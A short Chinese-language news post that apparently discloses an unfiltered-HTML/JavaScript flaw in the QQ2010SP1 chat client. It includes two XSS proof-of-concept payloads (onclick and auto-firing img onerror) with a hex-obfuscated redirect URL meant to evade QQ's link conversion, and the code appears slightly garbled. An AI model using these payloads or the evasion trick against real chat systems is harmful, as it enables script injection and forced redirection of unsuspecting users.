騰訊QQ2010SP1正式版驚現低級漏洞
- 熱點資訊
- 關注:1.07W次
騰訊QQ一向是騰訊主打的產品,意想不到前天發佈的QQ2010SP1竟然有如此大漏洞。用戶可以隨意在消息中使用Javascript、Html,騰訊並沒有對此進行有效的屏蔽,如此低級漏洞,在QQ這樣的軟件中出現實屬罕見。
截止發稿之日起,騰訊還沒有對此漏洞給出解決辦法,網友只有去下載試用QQ2010正式版來避免此問題。
點擊下載:QQ2010SP1正式版
首先囧一下:腳本出錯還會提示錯誤
1、消息記錄的Javascript、Html標籤沒有屏蔽
2、消息盒子Javascript、Html標籤沒有屏蔽
3、小實驗
1、發送代碼:<input onclick="tion=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />
因爲騰訊會自動將url轉換,我們必須混淆url才能發送
4、超牛代碼
<img src=’tetet’ onerror="tion=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>
因爲要點擊才能觸發,想到一個不用點擊就能觸發的代碼。
5、希望騰訊快點修復,這個漏洞非同小可
6、本漏洞由TGL發現。
- 文章版權屬於文章作者所有,轉載請註明 https://ygncw.com/jisuanji/redian/8rzkw8.html